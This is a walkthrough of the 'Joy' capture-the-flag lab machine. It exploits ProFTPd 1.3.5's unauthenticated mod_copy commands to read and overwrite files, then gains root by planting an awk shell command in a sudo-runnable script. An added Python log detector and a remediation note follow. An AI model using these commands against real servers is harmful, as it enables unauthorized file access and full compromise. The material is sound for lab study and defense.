Joy target machine penetration test walkthrough

1. Scanning the host

Scan the host with nmap

Nmap scan report for 192.168.100.132
Host is up (0.00034s latency).
Not shown: 988 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
465/tcp open  smtps
587/tcp open  submission
993/tcp open  imaps
995/tcp open  pop3s
MAC Address: 00:0C:29:5A:AF:CE (VMware)

Try logging in to FTP as anonymous with an empty password

Use get to download the file named directory and view it locally

root@kali:~/joy# cat directory 
Patrick's Directory
total 152
drwxr-xr-x 18 patrick patrick 4096 Feb 13 23:40 .
drwxr-xr-x  4 root    root    4096 Jan  6  2019 ..
-rw-r--r--  1 patrick patrick    0 Feb 13 22:45 1p7WHwvzeABBPt4KkGOypRYIztqPiQGw.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 22:55 35Od35p0FjacKjZ7CIA04Qodkh9BxrPi.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 23:15 64AYIQIbRHfkqDUnHQTJAtVmTIDviAdy.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 23:30 6ma4z0wzAewjAKWu1ehIxZwHOS3PxFIF.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 23:25 7S04t7kldXattvEh3tsfCXbJBtL20u3C.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 22:50 7WGf4cJPiKnGSdsu2AM0rMznRqNJUFGZ.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:20 7yATiRDp46XJOfoolcMBaUwCaXAtZF0zc9mITPDAwyAwm7rtcCOVLaCdUpqcd9Hj.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:10 9cJF5S8jZGE7wh84iwkvZvvU1jeteNCXcBf253nedX1YIQah6vgntkEftIxCdgfK.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 23:05 9geHegRe099CGGWT2EEpkpOZM4Nr34XX.txt
-rw-------  1 patrick patrick  185 Jan 28  2019 .bash_history
-rw-r--r--  1 patrick patrick  220 Dec 23  2018 .bash_logout
-rw-r--r--  1 patrick patrick 3526 Dec 23  2018 .bashrc
drwx------  7 patrick patrick 4096 Jan 10  2019 .cache
-rw-r--r--  1 patrick patrick    0 Feb 13 23:10 cFWaWa3ip89Kj1RTqIHo7ZuFDQHPoDOD.txt
drwx------ 10 patrick patrick 4096 Dec 26  2018 .config
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Desktop
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Documents
drwxr-xr-x  3 patrick patrick 4096 Jan  6  2019 Downloads
-rw-r--r--  1 patrick patrick    0 Feb 13 23:20 eQYwBAebPw59c26u0UsamXrXkP10GILY.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 23:35 Fs8TbaKUyJCxOMEDL5ZVJxbqcaQqlsZG.txt
drwx------  3 patrick patrick 4096 Dec 26  2018 .gnupg
-rwxrwxrwx  1 patrick patrick    0 Jan  9  2019 haha
-rw-r--r--  1 patrick patrick   24 Feb 13 23:30 ia5hVwcBag1IwpnBhdjw3gTShwDXwh7HkoUDVYmssVMaX64lx8dmczuXr7W5TbIa.txt
-rw-------  1 patrick patrick 8532 Jan 28  2019 .ICEauthority
-rw-r--r--  1 patrick patrick    0 Feb 13 23:40 JpIK4Qxt67Vttc1ADXE239wQhPC89kGL.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:40 jYep3dpBG0fgjMoIpHqRRmOB56NvzIJtGzSfgdsSULqw1YtuTY4hORGp1dt1SE1C.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:05 Kko1BTnf5Bck24Ha26IPQupjb3BpbwNP5i7suE0uBFMCPHXRYtxSlfWlJHhKVSv9.txt
drwxr-xr-x  3 patrick patrick 4096 Dec 26  2018 .local
-rw-r--r--  1 patrick patrick   24 Feb 13 22:55 MFUuLYbtSjYOJFmXwISxQKgW356M0WOBSXbsxjoloaQKqAVsTdT7RvnehlPcyNRv.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:00 mgJgyHQDjVFgIAebTpH4rcZLmIjUn51eoroOUIBkinpSDAfT9Peze7MLbfwkq6Gf.txt
drwx------  5 patrick patrick 4096 Dec 28  2018 .mozilla
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Music
drwxr-xr-x  2 patrick patrick 4096 Jan  8  2019 .nano
-rw-r--r--  1 patrick patrick   24 Feb 13 22:50 ohQb9KNNwW3HNhVq50l7QKPlOVhwvNbnXvRke2r4F8uhi9IJRM0I863CSkaxzvzJ.txt
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Pictures
-rw-r--r--  1 patrick patrick  675 Dec 23  2018 .profile
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Public
-rw-r--r--  1 patrick patrick   24 Feb 13 23:35 qj3FWDupjdMWDhs3gbCvRVnHO0WYUn077LGJrrjDEVOiZ5ac8xxo9knmhgSXsOSL.txt
-rw-r--r--  1 patrick patrick    0 Feb 13 23:00 qxP7CYF3llofecDFLMEnjGJC5czH6aOj.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 22:45 rAtrdQA1u0OSu8OgwyHCZOnfbtknUgAmhVU9BT0Hnew9GU5pG3lPQT82NyvijU1r.txt
d---------  2 root    root    4096 Jan  9  2019 script
drwx------  2 patrick patrick 4096 Dec 26  2018 .ssh
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 Sun
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Templates
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 .txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:25 UCotfI8X6dXQquvUrR8bGP3Fy4iXnqhs4J2D0ixh5zAAswS0QMgmDzxv2sDZs4FR.txt
-rw-r--r--  1 patrick patrick   24 Feb 13 23:15 UFhY9ZFrPHOl09e11YQLCOlNledaXj9Bdo2xZUgBqMpjA1QARplFQrpuqmvfpbVm.txt
-rw-r--r--  1 patrick patrick  407 Jan 27  2019 version_control
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Videos

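version_control may leak information

Over a telnet connection to the FTP port, the server's copy commands (site cpfr / site cpto) can be used to copy version_control from patrick's directory into the FTP directory, where it can be viewed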

root@kali:~/joy# telnet 192.168.100.132 21
Trying 192.168.100.132...
Connected to 192.168.100.132.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control
250 Copy successful
qiut
500 QIUT not understood
quit
221 Goodbye.
Connection closed by foreign host.
root@kali:~/joy# ls
directory  project_emilio  reminder  version_control
root@kali:~/joy# cat version_control 
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.

This reveals the service versions and that the web root is /var/www/tryingharderisjoy

Check whether ProFTPd 1.3.5 has known vulnerabilities

Version 1.3.5 has a command execution vulnerability, and it is supported by msf (Metasploit)

Use msf to attack the service and obtain a shell

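2. Privilege escalation

A username and password were found; after su patrick, sudo -l shows that the test file can be executed with root privileges, so a simple shell command can be written into that file

There is no permission to rewrite the file directly, but it can be uploaded over FTP and then copied over the existing file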

root@kali:~/joy# echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
root@kali:~/joy# ftp 192.168.100.132
Connected to 192.168.100.132.
220 The Good Tech Inc. FTP Server
Name (192.168.100.132:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Feb 13 16:26 upload
226 Transfer complete
ftp> cd upload
ftp> put test
local: test remote: test
200 PORT command successful
150 Opening BINARY mode data connection for test
226 Transfer complete
32 bytes sent in 0.00 secs (625.0000 kB/s)
root@kali:~/joy# telnet 192.168.100.132 21
Trying 192.168.100.132...
Connected to 192.168.100.132.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/upload/test
350 File or directory exists, ready for destination name
site cpto /home/patrick/script/test
250 Copy successful
421 Login timeout (300 seconds): closing control connection
Connection closed by foreign host.

Privilege escalation succeeded
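
Both copies above were made with site cpfr / site cpto on connections that never logged in. As an added example (not part of the original write-up), the Python below flags such copies in an FTP command log; the log layout, the client addresses and the user alice are constructed, and treating /home/ftp as the FTP root is an assumption based on the paths in the session.

```python
import posixpath
import re

FTP_ROOT = "/home/ftp"  # assumption: anonymous root, inferred from /home/ftp/upload
# Constructed log, one command per line: client, user ("-" = not logged in),
# quoted command, reply code. Layout, addresses and "alice" are made up.
SAMPLE_LOG = """\
192.168.100.1 - "SITE CPFR /home/patrick/version_control" 350
192.168.100.1 - "SITE CPTO /home/ftp/upload/version_control" 250
192.168.100.1 anonymous "STOR test" 226
192.168.100.1 - "SITE CPFR /home/ftp/upload/test" 350
192.168.100.1 - "SITE CPTO /home/patrick/script/test" 250
192.168.100.7 alice "SITE CPFR /home/ftp/upload/a.txt" 350
192.168.100.7 alice "SITE CPTO /home/ftp/download/a.txt" 250
"""
LINE = re.compile(r'^(\S+) (\S+) "SITE (CPFR|CPTO) (.+)" (\d{3})$', re.I)

def outside_root(path, root=FTP_ROOT):
    """True if the normalized path is neither the FTP root nor below it."""
    norm = posixpath.normpath(path)
    return not (norm == root or norm.startswith(root + "/"))

def find_copy_abuse(log_text):
    """Pair each accepted CPFR with the next CPTO from the same client."""
    pending = {}  # client -> source path of the last accepted CPFR
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # not a SITE CPFR/CPTO line
        client, user, verb, path, code = m.groups()
        if verb.upper() == "CPFR":
            if code == "350":
                pending[client] = path
            continue
        src = pending.pop(client, None)
        if src is None or code != "250":
            continue  # CPTO without a source, or the copy was refused
        checks = [(user == "-", "unauthenticated"),
                  (outside_root(src), "read outside FTP root"),
                  (outside_root(path), "write outside FTP root")]
        reasons = [why for hit, why in checks if hit]
        if reasons:
            alerts.append((client, src, path, reasons))
    return alerts

if __name__ == "__main__":
    for alert in find_copy_abuse(SAMPLE_LOG):
        print(alert)
```

SITE CPFR and SITE CPTO come from ProFTPD's mod_copy module; where the module is not needed, not loading it removes these commands entirely.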
